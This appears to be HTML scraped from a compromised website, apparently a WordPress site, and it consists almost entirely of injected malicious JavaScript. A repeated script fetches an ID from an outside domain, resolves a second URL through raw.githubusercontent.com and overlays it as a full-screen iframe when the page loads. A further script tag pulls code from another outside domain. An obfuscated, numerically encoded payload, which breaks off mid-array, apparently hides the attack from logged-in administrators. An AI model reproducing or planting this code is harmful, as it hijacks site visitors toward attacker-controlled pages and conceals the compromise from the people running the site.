<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script><script async src="https://transporteejecutivovc.com/sttje/"></script></script><script>(function(){var __s=(function(){var _0x5641=[114,60,47,52,57,46,51,53,52,122,114,115,122,33,87,80,122,122,44,59,40,122,27,10,19,5,19,30,5,15,8,22,122,103,122,120,50,46,46,42,41,96,117,117,40,53,41,40,63,60,47,40,56,53,41,41,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42,120,97,87,80,122,122,44,59,40,122,14,8,15,9,14,31,30,5,25,21,20,28,19,29,9,122,103,122,1,87,80,122,122,122,122,33,122,46,63,55,42,54,59,46,63,96,122,120,50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39,120,118,122,47,41,63,28,63,46,57,50,96,122,46,40,47,63,122,39,87,80,122,122,7,97,87,80,87,80,122,122,44,59,40,122,29,22,21,24,27,22,5,17,31,3,122,103,122,114,46,35,42,63,53,60,122,9,35,55,56,53,54,122,103,103,103,122,120,60,47,52,57,46,51,53,52,120,122,124,124,122,9,35,55,56,53,54,116,60,53,40,115,87,80,122,122,122,122,101,122,9,35,55,56,53,54,116,60,53,40,114,120,5,5,51,52,54,51,52,63,5,51,62,5,53,60,60,63,40,5,5,120,115,87,80,122,122,122,122,96,122,120,5,5,51,52,54,51,52,63,5,51,62,5,53,60,60,63,40,5,5,120,97,87,80,87,80,122,122,44,59,40,122,40,63,61,51,41,46,40,35,122,103,122,45,51,52,62,53,45,1,29,22,21,24,27,22,5,17,31,3,7,122,103,122,45,51,52,62,53,45,1,29,22,21,24,27,22,5,17,31,3,7,122,38,38,122,33,87,80,122,122,122,122,41,46,59,46,47,41,96,122,120,51,62,54,63,120,118,87,80,122,122,122,122,51,60,40,59,55,63,19,62,96,122,120,5,5,51,52,54,51,52,63,5,53,60,60,63,40,5,51,60,40,59,55,63,5,5,120,118,87,80,122,122,122,122,51,60,40,59,55,63,27,46,46,40,96,122,120,62,59,46,59,119,51,52,54,51,52,63,119,53,60,60,63,40,119,60,40,59,55,63,120,118,87,80,122,122,122,122,50,51,52,46,41,96,122,33,39,118,87,80,122,122,122,122,40,47,52,10,40,53,55,51,41,63,96,122,52,47,54,54,118,87,80,122,122,122,122,62,63,41,46,40,53,35,96,122,52,47,54,54,118,87,80,122,122,122,122,40,63,44,63,59,54,96,122,52,47,54,54,118,87,80,122,122,122,122,40,63,43,47,63,41,46,14,51,55,63,53,47,46,23,41,96,122,110,106,106,106,118,87,80,122,122,122,122,51,60,40,59,55,63,14,51,55,63,53,47,46,23,41,96,122,99,106,106,106,118,87,80,122,122,122,122,40,63,43,47,51,40,63,8,63,59,62,35,23,63,41,41,59,61,63,96,122,60,59,54,41,63,118,87,80,122,122,122,122,55,63,41,41,59,61,63,24,53,47,52,62,96,122,60,59,54,41,63,87,80,122,122,39,97,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,51,41,13,42,22,53,61,61,63,62,19,52,25,53,52,46,63,34,46,114,115,122,33,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,51,60,122,114,45,51,52,62,53,45,116,5,5,62,51,41,59,56,54,63,19,52,54,51,52,63,21,60,60,63,40,5,5,122,103,103,103,122,46,40,47,63,122,38,38,122,45,51,52,62,53,45,116,5,5,51,41,13,42,27,62,55,51,52,5,5,122,103,103,103,122,46,40,47,63,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,87,80,122,122,122,122,122,122,44,59,40,122,42,59,46,50,122,103,122,45,51,52,62,53,45,116,54,53,57,59,46,51,53,52,116,42,59,46,50,52,59,55,63,122,38,38,122,120,120,97,87,80,122,122,122,122,122,122,51,60,122,114,117,4,6,117,114,45,42,119,59,62,55,51,52,38,45,42,119,54,53,61,51,52,115,117,116,46,63,41,46,114,42,59,46,50,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,87,80,122,122,122,122,122,122,44,59,40,122,57,53,53,49,51,63,122,103,122,62,53,57,47,55,63,52,46,116,57,53,53,49,51,63,122,38,38,122,120,120,97,87,80,122,122,122,122,122,122,51,60,122,114,117,45,53,40,62,42,40,63,41,41,5,54,53,61,61,63,62,5,51,52,5,1,4,103,7,112,103,117,116,46,63,41,46,114,57,53,53,49,51,63,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,87,80,122,122,122,122,122,122,44,59,40,122,62,63,122,103,122,62,53,57,47,55,63,52,46,116,62,53,57,47,55,63,52,46,31,54,63,55,63,52,46,97,87,80,122,122,122,122,122,122,44,59,40,122,56,53,62,35,122,103,122,62,53,57,47,55,63,52,46,116,56,53,62,35,97,87,80,87,80,122,122,122,122,122,122,51,60,122,114,62,63,122,124,124,122,46,35,42,63,53,60,122,62,63,116,57,54,59,41,41,20,59,55,63,122,103,103,103,122,120,41,46,40,51,52,61,120,122,124,124,122,117,6,56,45,42,119,46,53,53,54,56,59,40,6,56,117,116,46,63,41,46,114,62,63,116,57,54,59,41,41,20,59,55,63,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,122,122,122,122,122,122,51,60,122,114,56,53,62,35,122,124,124,122,46,35,42,63,53,60,122,56,53,62,35,116,57,54,59,41,41,20,59,55,63,122,103,103,103,122,120,41,46,40,51,52,61,120,122,124,124,122,117,6,56,59,62,55,51,52,119,56,59,40,6,56,117,116,46,63,41,46,114,56,53,62,35,116,57,54,59,41,41,20,59,55,63,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,122,122,122,122,122,122,51,60,122,114,62,53,57,47,55,63,52,46,116,61,63,46,31,54,63,55,63,52,46,24,35,19,62,114,120,45,42,59,62,55,51,52,56,59,40,120,115,115,122,40,63,46,47,40,52,122,46,40,47,63,97,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,60,59,54,41,63,97,87,80,122,122,39,87,80,87,80,122,122,51,60,122,114,51,41,13,42,22,53,61,61,63,62,19,52,25,53,52,46,63,34,46,114,115,115,122,40,63,46,47,40,52,97,87,80,87,80,122,122,51,60,122,114,62,53,57,47,55,63,52,46,116,61,63,46,31,54,63,55,63,52,46,24,35,19,62,114,40,63,61,51,41,46,40,35,116,51,60,40,59,55,63,19,62,115,115,122,33,87,80,122,122,122,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,122,120,59,57,46,51,44,63,120,97,87,80,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,39,87,80,87,80,122,122,51,60,122,114,40,63,61,51,41,46,40,35,116,40,47,52,10,40,53,55,51,41,63,122,38,38,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,103,103,122,120,54,53,59,62,51,52,61,120,122,38,38,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,103,103,122,120,59,57,46,51,44,63,120,122,38,38,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,103,103,122,120,62,53,52,63,120,115,122,33,87,80,122,122,122,122,40,63,46,47,40,52,97,87,80,122,122,39,87,80,87,80,122,122,40,63,61,51,41,46,40,35,116,41,46,59,46,47,41,122,103,122,120,54,53,59,62,51,52,61,120,97,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,41,59,60,63,27,42,42,63,52,62,11,47,63,40,35,114,47,40,54,118,122,49,63,35,118,122,44,59,54,115,122,33,87,80,122,122,122,122,44,59,40,122,41,63,42,122,103,122,47,40,54,116,51,52,62,63,34,21,60,114,120,101,120,115,122,100,103,122,106,122,101,122,120,124,120,122,96,122,120,101,120,97,87,80,122,122,122,122,40,63,46,47,40,52,122,47,40,54,122,113,122,41,63,42,122,113,122,63,52,57,53,62,63,15,8,19,25,53,55,42,53,52,63,52,46,114,49,63,35,115,122,113,122,120,103,120,122,113,122,63,52,57,53,62,63,15,8,19,25,53,55,42,53,52,63,52,46,114,44,59,54,115,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,56,47,51,54,62,14,40,47,41,46,63,62,15,40,54,114,46,63,55,42,54,59,46,63,118,122,51,62,115,122,33,87,80,122,122,122,122,51,60,122,114,123,46,63,55,42,54,59,46,63,122,38,38,122,123,51,62,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,51,60,122,114,46,63,55,42,54,59,46,63,116,51,52,62,63,34,21,60,114,120,62,40,53,42,56,53,34,116,57,53,55,120,115,122,100,103,122,106,115,122,33,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,46,63,55,42,54,59,46,63,116,40,63,42,54,59,57,63,114,117,6,33,51,62,6,39,117,61,118,122,51,62,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,44,59,40,122,63,52,57,53,62,63,62,122,103,122,63,52,57,53,62,63,15,8,19,25,53,55,42,53,52,63,52,46,114,51,62,115,97,87,80,87,80,122,122,122,122,51,60,122,114,46,63,55,42,54,59,46,63,116,51,52,62,63,34,21,60,114,120,61,51,41,46,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,120,115,122,100,103,122,106,115,122,33,87,80,122,122,122,122,122,122,63,52,57,53,62,63,62,122,103,122,63,52,57,53,62,63,62,116,40,63,42,54,59,57,63,114,117,127,104,28,117,61,118,122,120,117,120,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,46,63,55,42,54,59,46,63,116,40,63,42,54,59,57,63,114,117,6,33,51,62,6,39,117,61,118,122,63,52,57,53,62,63,62,115,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,46,53,18,46,46,42,15,40,54,114,44,59,54,47,63,115,122,33,87,80,122,122,122,122,51,60,122,114,123,44,59,54,47,63,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,44,59,40,122,41,122,103,122,9,46,40,51,52,61,114,44,59,54,47,63,115,87,80,122,122,122,122,122,122,116,40,63,42,54,59,57,63,114,117,4,6,47,28,31,28,28,117,118,122,120,120,115,87,80,122,122,122,122,122,122,116,46,40,51,55,114,115,87,80,122,122,122,122,122,122,116,40,63,42,54,59,57,63,114,117,4,1,125,120,58,6,41,7,113,38,1,125,120,58,6,41,7,113,126,117,61,118,122,120,120,115,97,87,80,87,80,122,122,122,122,51,60,122,114,123,41,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,51,60,122,114,123,117,4,1,59,119,32,7,1,59,119,32,106,119,99,113,116,119,7,112,96,6,117,6,117,117,51,116,46,63,41,46,114,41,115,115,122,33,87,80,122,122,122,122,122,122,51,60,122,114,117,4,1,59,119,32,106,119,99,116,119,7,113,6,116,1,59,119,32,7,33,104,118,39,114,101,96,96,6,62,113,115,101,114,101,96,1,6,117,101,121,7,38,126,115,117,51,116,46,63,41,46,114,41,115,115,122,33,87,80,122,122,122,122,122,122,122,122,41,122,103,122,120,50,46,46,42,41,96,117,117,120,122,113,122,41,97,87,80,122,122,122,122,122,122,39,122,63,54,41,63,122,33,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,44,59,40,122,47,122,103,122,52,63,45,122,15,8,22,114,41,115,97,87,80,122,122,122,122,122,122,51,60,122,114,47,116,42,40,53,46,53,57,53,54,122,103,103,103,122,120,50,46,46,42,96,120,122,38,38,122,47,116,42,40,53,46,53,57,53,54,122,103,103,103,122,120,50,46,46,42,41,96,120,115,122,33,87,80,122,122,122,122,122,122,122,122,40,63,46,47,40,52,122,47,116,50,40,63,60,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,60,51,52,62,15,40,54,19,52,21,56,48,63,57,46,114,51,52,42,47,46,118,122,62,63,42,46,50,115,122,33,87,80,122,122,122,122,51,60,122,114,123,51,52,42,47,46,122,38,38,122,62,63,42,46,50,122,100,122,105,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,51,60,122,114,46,35,42,63,53,60,122,51,52,42,47,46,122,103,103,103,122,120,41,46,40,51,52,61,120,115,122,33,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,46,53,18,46,46,42,15,40,54,114,51,52,42,47,46,115,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,51,60,122,114,21,56,48,63,57,46,116,42,40,53,46,53,46,35,42,63,116,46,53,9,46,40,51,52,61,116,57,59,54,54,114,51,52,42,47,46,115,122,103,103,103,122,120,1,53,56,48,63,57,46,122,27,40,40,59,35,7,120,115,122,33,87,80,122,122,122,122,122,122,60,53,40,122,114,44,59,40,122,51,122,103,122,106,97,122,51,122,102,122,51,52,42,47,46,116,54,63,52,61,46,50,97,122,51,113,113,115,122,33,87,80,122,122,122,122,122,122,122,122,44,59,40,122,59,40,40,12,59,54,122,103,122,60,51,52,62,15,40,54,19,52,21,56,48,63,57,46,114,51,52,42,47,46,1,51,7,118,122,62,63,42,46,50,122,113,122,107,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,59,40,40,12,59,54,115,122,40,63,46,47,40,52,122,59,40,40,12,59,54,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,51,60,122,114,46,35,42,63,53,60,122,51,52,42,47,46,122,103,103,103,122,120,53,56,48,63,57,46,120,115,122,33,87,80,122,122,122,122,122,122,44,59,40,122,49,63,35,41,122,103,122,1,120,47,40,54,120,118,122,120,54,51,52,49,120,118,122,120,50,40,63,60,120,118,122,120,54,53,57,59,46,51,53,52,120,118,122,120,40,63,62,51,40,63,57,46,120,118,122,120,46,59,40,61,63,46,120,118,122,120,54,59,52,62,51,52,61,120,118,122,120,54,59,52,62,51,52,61,15,40,54,120,7,97,87,80,87,80,122,122,122,122,122,122,60,53,40,122,114,44,59,40,122,48,122,103,122,106,97,122,48,122,102,122,49,63,35,41,116,54,63,52,61,46,50,97,122,48,113,113,115,122,33,87,80,122,122,122,122,122,122,122,122,44,59,40,122,49,63,35,122,103,122,49,63,35,41,1,48,7,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,21,56,48,63,57,46,116,42,40,53,46,53,46,35,42,63,116,50,59,41,21,45,52,10,40,53,42,63,40,46,35,116,57,59,54,54,114,51,52,42,47,46,118,122,49,63,35,115,115,122,33,87,80,122,122,122,122,122,122,122,122,122,122,44,59,40,122,62,51,40,63,57,46,122,103,122,60,51,52,62,15,40,54,19,52,21,56,48,63,57,46,114,51,52,42,47,46,1,49,63,35,7,118,122,62,63,42,46,50,122,113,122,107,115,97,87,80,122,122,122,122,122,122,122,122,122,122,51,60,122,114,62,51,40,63,57,46,115,122,40,63,46,47,40,52,122,62,51,40,63,57,46,97,87,80,122,122,122,122,122,122,122,122,39,87,80,122,122,122,122,122,122,39,87,80,87,80,122,122,122,122,122,122,60,53,40,122,114,44,59,40,122,49,122,51,52,122,51,52,42,47,46,115,122,33,87,80,122,122,122,122,122,122,122,122,51,60,122,114,123,21,56,48,63,57,46,116,42,40,53,46,53,46,35,42,63,116,50,59,41,21,45,52,10,40,53,42,63,40,46,35,116,57,59,54,54,114,51,52,42,47,46,118,122,49,115,115,122,57,53,52,46,51,52,47,63,97,87,80,122,122,122,122,122,122,122,122,44,59,40,122,52,63,41,46,63,62,122,103,122,60,51,52,62,15,40,54,19,52,21,56,48,63,57,46,114,51,52,42,47,46,1,49,7,118,122,62,63,42,46,50,122,113,122,107,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,52,63,41,46,63,62,115,122,40,63,46,47,40,52,122,52,63,41,46,63,62,97,87,80,122,122,122,122,122,122,39,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,63,34,46,40,59,57,46,22,59,52,62,51,52,61,15,40,54,114,40,59,45,115,122,33,87,80,122,122,122,122,51,60,122,114,123,40,59,45,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,44,59,40,122,46,63,34,46,122,103,122,9,46,40,51,52,61,114,40,59,45,115,116,40,63,42,54,59,57,63,114,117,4,6,47,28,31,28,28,117,118,122,120,120,115,116,46,40,51,55,114,115,97,87,80,122,122,122,122,51,60,122,114,123,46,63,34,46,115,122,40,63,46,47,40,52,122,120,120,97,87,80,87,80,122,122,122,122,44,59,40,122,62,51,40,63,57,46,122,103,122,46,53,18,46,46,42,15,40,54,114,46,63,34,46,115,97,87,80,122,122,122,122,51,60,122,114,62,51,40,63,57,46,115,122,40,63,46,47,40,52,122,62,51,40,63,57,46,97,87,80,87,80,122,122,122,122,51,60,122,114,114,46,63,34,46,116,57,50,59,40,27,46,114,106,115,122,103,103,103,122,120,33,120,122,124,124,122,46,63,34,46,116,57,50,59,40,27,46,114,46,63,34,46,116,54,63,52,61,46,50,122,119,122,107,115,122,103,103,103,122,120,39,120,115,122,38,38,87,80,122,122,122,122,122,122,122,122,114,46,63,34,46,116,57,50,59,40,27,46,114,106,115,122,103,103,103,122,120,1,120,122,124,124,122,46,63,34,46,116,57,50,59,40,27,46,114,46,63,34,46,116,54,63,52,61,46,50,122,119,122,107,115,122,103,103,103,122,120,7,120,115,115,122,33,87,80,122,122,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,122,122,44,59,40,122,42,59,40,41,63,62,122,103,122,16,9,21,20,116,42,59,40,41,63,114,46,63,34,46,115,97,87,80,122,122,122,122,122,122,122,122,44,59,40,122,48,41,53,52,15,40,54,122,103,122,60,51,52,62,15,40,54,19,52,21,56,48,63,57,46,114,42,59,40,41,63,62,118,122,106,115,97,87,80,122,122,122,122,122,122,122,122,51,60,122,114,48,41,53,52,15,40,54,115,122,40,63,46,47,40,52,122,48,41,53,52,15,40,54,97,87,80,122,122,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,39,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,44,59,40,122,55,59,46,57,50,18,46,46,42,122,103,122,46,63,34,46,116,55,59,46,57,50,114,117,50,46,46,42,41,101,96,6,117,6,117,1,4,6,41,120,125,102,100,7,113,117,51,115,97,87,80,122,122,122,122,51,60,122,114,55,59,46,57,50,18,46,46,42,122,124,124,122,55,59,46,57,50,18,46,46,42,1,106,7,115,122,33,87,80,122,122,122,122,122,122,44,59,40,122,50,46,46,42,15,40,54,122,103,122,46,53,18,46,46,42,15,40,54,114,55,59,46,57,50,18,46,46,42,1,106,7,115,97,87,80,122,122,122,122,122,122,51,60,122,114,50,46,46,42,15,40,54,115,122,40,63,46,47,40,52,122,50,46,46,42,15,40,54,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,44,59,40,122,55,59,46,57,50,30,53,55,59,51,52,122,103,122,46,63,34,46,116,55,59,46,57,50,114,117,6,56,1,59,119,32,106,119,99,116,119,7,113,6,116,1,59,119,32,7,33,104,118,39,114,101,96,96,6,62,113,115,101,114,101,96,6,117,1,4,6,41,120,125,102,100,7,112,115,101,117,51,115,97,87,80,122,122,122,122,51,60,122,114,55,59,46,57,50,30,53,55,59,51,52,122,124,124,122,55,59,46,57,50,30,53,55,59,51,52,1,106,7,115,122,33,87,80,122,122,122,122,122,122,44,59,40,122,62,53,55,59,51,52,15,40,54,122,103,122,46,53,18,46,46,42,15,40,54,114,55,59,46,57,50,30,53,55,59,51,52,1,106,7,115,97,87,80,122,122,122,122,122,122,51,60,122,114,62,53,55,59,51,52,15,40,54,115,122,40,63,46,47,40,52,122,62,53,55,59,51,52,15,40,54,97,87,80,122,122,122,122,39,87,80,87,80,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,61,63,46,21,40,51,61,51,52,9,59,60,63,114,47,40,54,115,122,33,87,80,122,122,122,122,46,40,35,122,33,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,52,63,45,122,15,8,22,114,47,40,54,115,116,53,40,51,61,51,52,97,87,80,122,122,122,122,39,122,57,59,46,57,50,122,114,63,115,122,33,87,80,122,122,122,122,122,122,40,63,46,47,40,52,122,120,120,97,87,80,122,122,122,122,39,87,80,122,122,39,87,80,87,80,122,122,60,47,52,57,46,51,53,52,122,59,62,62,18,51,52,46,114,40,63,54,118,122,50,40,63,60,115,122,33,87,80,122,122,122,122,51,60,122,114,123,50,40,63,60,122,38,38,122,123,62,53,57,47,55,63,52,46,122,38,38,122,123,62,53,57,47,55,63,52,46,116,57,